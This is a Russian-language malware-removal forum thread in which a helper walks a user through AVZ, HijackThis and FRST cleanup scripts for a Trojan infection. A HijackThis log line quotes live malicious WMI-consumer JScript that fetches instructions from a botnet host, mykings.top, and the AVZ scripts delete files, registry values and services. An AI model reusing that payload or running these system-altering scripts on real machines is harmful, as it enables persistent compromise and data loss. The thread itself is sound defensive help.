Antivitamin
Новый пользователь
- Сообщения
- 4
- Реакции
- 1
Такая тема уже была на форуме... но очень давно.
Решена Интернет работает только в Firefox.
- Автор темы Antivitamin
- Дата начала
-
- Теги
- trojan
Переводчик Google
- Статус
- Сообщения
- 26,863
- Решения
- 29
- Реакции
- 14,323
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
SetServiceStart('Windows Audio Control', 4);
StopService('Windows Audio Control');
QuarantineFile('C:\WINDOWS\help\lsmosee.exe','');
QuarantineFile('c:\program files\common files\conime.exe','');
DeleteFile('c:\program files\common files\conime.exe','32');
DeleteFile('C:\Program Files\Common Files\conime.exe','32');
DeleteFile('C:\WINDOWS\help\lsmosee.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
DeleteService('Windows Audio Control');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:
Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
R3 - HKU\S-1-5-21-790525478-725345543-682003330-1005: Default URLSearchHook is missing
O2 - HKLM\..\BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - (no file)
O4 - MSConfig\startupreg: vProt [command] = C:\Program Files\AVG Web TuneUp\vprot.exe (file missing) (HKLM) (2017/05/30)
O5 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\don't load: [nvcpl.cpl] (file missing)
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
- Сообщения
- 26,863
- Решения
- 29
- Реакции
- 14,323
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Antivitamin
Новый пользователь
- Сообщения
- 4
- Реакции
- 1
Все выполнил.
- Сообщения
- 26,863
- Решения
- 29
- Реакции
- 14,323
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: VirusTotal: C:\WINDOWS\system32\msfeedssync.exe HKU\S-1-5-21-790525478-725345543-682003330-1003\...\MountPoints2: {1b9ce7aa-9ca3-11e2-9399-4c72b9b0c65a} - "G:\WD SmartWare.exe" autoplay=true 2018-08-02 22:24 - 2018-08-02 22:24 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat MSCONFIG\startupreg: start => MSCONFIG\startupreg: start1 => EmptyTemp: Reboot: End:: - Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Что с проблемой?
Antivitamin
Новый пользователь
- Сообщения
- 4
- Реакции
- 1
Доброе утро. Задержался по работе в Стокгольме.
Все пофиксил.
Все пофиксил.
- Сообщения
- 26,863
- Решения
- 29
- Реакции
- 14,323
Добрый день!
Antivitamin
Новый пользователь
- Сообщения
- 4
- Реакции
- 1
Проблема решена. Благодарю Вас! 
- Сообщения
- 26,863
- Решения
- 29
- Реакции
- 14,323
Подготовьте лог SecurityCheck by glax24
Ознакомьтесь: Рекомендации после лечения
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
Ознакомьтесь: Рекомендации после лечения
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
- Запустите AVZ.
- Выполните обновление баз (Меню Файл - Обновление баз)
- Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
- В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
- Закачайте полученный архив, как описано на этой странице.
- Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.
- Статус